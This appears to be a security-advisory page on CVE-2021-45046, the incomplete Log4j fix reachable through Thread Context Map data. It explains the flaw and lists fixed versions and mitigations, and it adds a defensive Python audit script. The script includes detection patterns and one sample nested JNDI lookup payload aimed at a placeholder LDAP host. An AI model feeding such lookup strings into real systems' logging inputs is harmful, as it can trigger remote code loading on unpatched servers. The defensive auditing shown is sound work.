Cyber Resilience

CVE-2021-45046

Critical · CISA KEV · Active Exploitation · EUVD Exploited · Ransomware-linked · RCE

Published: 14 December 2021
Modified: 27 October 2025
KEV Added: 01 May 2023
Patch: available
CVSS Score v3.1: 9.0 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)
EPSS Score: 0.9998 (100.0th percentile)
Risk Priority: 100 (floored blend · peak EPSS)

Summary

CVE-2021-45046 is a critical-severity Expression Language Injection (CWE-917) vulnerability in Apache Log4j 2. Its CVSS v3.1 base score is 9.0 (Critical).

Operationally, its EPSS score of 0.9998 places it in the 100th percentile of all CVEs by exploit likelihood, and CISA has added it to the Known Exploited Vulnerabilities catalog.

The strongest mitigations our analysis identified are NIST 800-53 CM-7 (Least Functionality) and SI-2 (Flaw Remediation).

Deeper analysis

The vulnerability is an incomplete remediation of CVE-2021-44228 in Apache Log4j 2.15.0 that leaves certain non-default configurations exposed. Log4j 2.15.0 stopped resolving lookups inside log messages, but a Pattern Layout that itself contains a Context Lookup (such as $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) still substitutes values from the Thread Context Map (MDC) into the layout, where a lookup expression inside the value is evaluated. An attacker who can supply data to the MDC can therefore embed a JNDI Lookup expression in that data. The issue affects Log4j 2.15.0 and earlier 2.x releases on both the Java 8 and Java 7 release lines; the affected version ranges are listed under Affected Assets.

An attacker with control over MDC input data can therefore supply a crafted string that triggers JNDI resolution. Successful exploitation yields an information leak and remote code execution in some environments, and local code execution in all environments. The attack requires neither privileges nor user interaction; the high attack complexity (AC:H) in the CVSS 3.1 vector AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H reflects the non-default configuration the attacker depends on, giving a score of 9.0.

Vendor guidance and subsequent patches state that the issue is resolved in Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) by removing support for message lookup patterns entirely and disabling JNDI functionality by default. Public advisories from the oss-security list and Siemens product-cert bulletins reiterate these version upgrades as the primary mitigation.
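As an added example (not code from this page, from Apache Log4j, or from any of the advisories cited), the Python script below checks the conditions the analysis above combines, and it also serves the baseline-configuration check described under Mitigating Controls: whether a log4j2.xml PatternLayout uses a Context Lookup or a Thread Context Map pattern, whether the installed Log4j 2.x release is at or above the fixed version for its line (2.16.0 on the Java 8 line, 2.12.2 on the Java 7 line), and whether a value about to be placed in the MDC begins a lookup expression. The two configurations, the version strings and the MDC values are constructed for the example; the fixed-version mapping is an assumption that models only the two releases this page names and treats every other unfixed 2.x release conservatively as needing an upgrade.

```python
"""Audit helpers for CVE-2021-45046 (added example, not Apache Log4j code).

Three checks that follow from the analysis above:
  1. does a log4j2.xml PatternLayout use a Context Lookup ($${ctx:...})
     or a Thread Context Map pattern (%X, %mdc, %MDC)?
  2. is the installed Log4j 2.x release at or above the fix for its line
     (2.16.0 on the Java 8 line, 2.12.2 on the Java 7 line)?
  3. does a value about to be put into the MDC start a lookup expression?
All sample data below is constructed for the example."""
import re
import xml.etree.ElementTree as ET

# Context Lookup in a layout, with or without the deferred "$$" prefix.
CTX_LOOKUP = re.compile(r"\$\$?\{ctx:[^}]*\}")
# Thread Context Map conversion patterns named in the advisory.
MDC_CONVERSION = re.compile(r"%(?:X|mdc|MDC)\b")
# Every Log4j lookup expression, nested or obfuscated, starts with "${".
LOOKUP_START = re.compile(r"\$\{")


def risky_patterns(config_xml: str) -> list[tuple[str, str]]:
    """Return (pattern, reason) for each PatternLayout in the config that
    would route attacker-controlled MDC values into lookup resolution."""
    findings = []
    for layout in ET.fromstring(config_xml).iter("PatternLayout"):
        # The pattern is either an attribute or a nested <Pattern> element.
        pattern = layout.get("pattern")
        if pattern is None:
            node = layout.find("Pattern")
            pattern = node.text if node is not None else None
        if not pattern:
            continue
        if CTX_LOOKUP.search(pattern):
            findings.append((pattern, "Context Lookup ${ctx:...} in layout"))
        if MDC_CONVERSION.search(pattern):
            findings.append((pattern, "Thread Context Map pattern %X/%mdc/%MDC"))
    return findings


def parse_version(version: str) -> tuple[int, ...]:
    """'2.15.0' -> (2, 15, 0); a qualifier such as '-beta9' is dropped."""
    return tuple(int(part) for part in version.split("-")[0].split("."))


def is_fixed(version: str) -> bool:
    """True when the release is at or above the fix for its line.
    Assumption: only the two fixed releases this page names are modelled;
    the Java 7 line (2.12.x) is fixed at 2.12.2, every other 2.x line at
    2.16.0. Log4j 1.x is a different code base and is rejected."""
    v = parse_version(version)
    if v[0] != 2:
        raise ValueError("only Log4j 2.x releases are modelled here")
    if v[:2] == (2, 12):
        return v >= (2, 12, 2)
    return v >= (2, 16, 0)


def assess(config_xml: str, version: str) -> str:
    """'patched' if the release is fixed; 'exposed' if an unfixed release
    uses a risky layout; 'upgrade' if unfixed but the layout is safe
    (not reachable through CVE-2021-45046, still not a fixed release)."""
    if is_fixed(version):
        return "patched"
    return "exposed" if risky_patterns(config_xml) else "upgrade"


def mdc_value_is_suspicious(value: str) -> bool:
    """Input-side guard to apply before ThreadContext.put(): flag any
    value that begins a lookup, which also catches nested forms that hide
    the 'jndi' token behind another lookup."""
    return LOOKUP_START.search(value) is not None


# Constructed sample configurations: the first is the non-default layout
# the advisory describes, the second the same appender without the
# Context Lookup or %X pattern (an interim measure, not a substitute for
# upgrading to a fixed release).
VULNERABLE_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d{HH:mm:ss} user=$${ctx:loginId} req=%X{requestId} %-5level %msg%n"/>
    </Console>
  </Appenders>
  <Loggers><Root level="info"><AppenderRef ref="Console"/></Root></Loggers>
</Configuration>"""

HARDENED_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d{HH:mm:ss} %-5level %msg%n"/>
    </Console>
  </Appenders>
  <Loggers><Root level="info"><AppenderRef ref="Console"/></Root></Loggers>
</Configuration>"""

if __name__ == "__main__":
    for version in ("2.15.0", "2.16.0", "2.12.1", "2.12.2"):
        print(version, assess(VULNERABLE_CONFIG, version), assess(HARDENED_CONFIG, version))
    for _, reason in risky_patterns(VULNERABLE_CONFIG):
        print("risky:", reason)
    # A constructed MDC value carrying a nested lookup.
    print(mdc_value_is_suspicious("${${lower:j}ndi:ldap://203.0.113.5/a}"))
```

Run it against a real log4j2.xml by reading the file into `assess()` together with the version reported by the deployed jar; an `upgrade` result on 2.15.0 means the layout is not the one this CVE reaches, not that the host is safe, since the fix is the version upgrade and the layout change only narrows exposure in the meantime.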

Vulnerability details

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.

CWE(s)
CWE-917 (Improper Neutralization of Special Elements used in an Expression Language Statement, "Expression Language Injection")

Related Threats

CVEs Like This One

CVE-2021-44228 · Same product: Apache / Log4j · both on KEV
CVE-2023-4911 · Same product: Debian / Debian Linux · both on KEV
CVE-2023-5631 · Same product: Debian / Debian Linux · both on KEV
CVE-2022-0847 · Same product: Fedoraproject / Fedora · both on KEV
CVE-2025-24813 · Same product: Debian / Debian Linux · both on KEV
CVE-2014-0160 · Same product: Debian / Debian Linux · both on KEV
CVE-2016-5195 · Same product: Debian / Debian Linux · both on KEV
CVE-2020-1472 · Same product: Debian / Debian Linux · both on KEV
CVE-2021-3156 · Same product: Debian / Debian Linux · both on KEV
CVE-2026-24061 · Same product: Debian / Debian Linux · both on KEV

Affected Assets

apache / log4j: 2.0 · 2.0.1 — 2.12.2 · 2.13.0 — 2.16.0
cvat / computer vision annotation tool: all versions
intel / audio development kit: all versions
intel / datacenter manager: all versions
intel / genomics kernel library: all versions
intel / oneapi: all versions
intel / secure device onboard: all versions
intel / sensor solution firmware development kit: all versions
intel / system debugger: all versions
intel / system studio: all versions
+45 more product configuration(s) — see NVD for full list

Mitigating Controls (NIST 800-53 r5)

prevent · SI-2 (Flaw Remediation)

Directly requires timely application of the vendor patches (Log4j 2.16.0 / 2.12.2) that remove message lookup support and disable JNDI by default, eliminating the incomplete CVE-2021-44228 remediation.

prevent · CM-7 (Least Functionality)

Mandates disabling or removing non-essential features such as JNDI lookups and Context/Map pattern interpolation in Log4j, exactly matching the configuration changes that close this attack vector.

prevent

Requires enforcing secure baseline settings for logging Pattern Layouts so that non-default Context Lookup or %X/%mdc patterns are never active, preventing attacker-controlled MDC data from triggering JNDI resolution.

References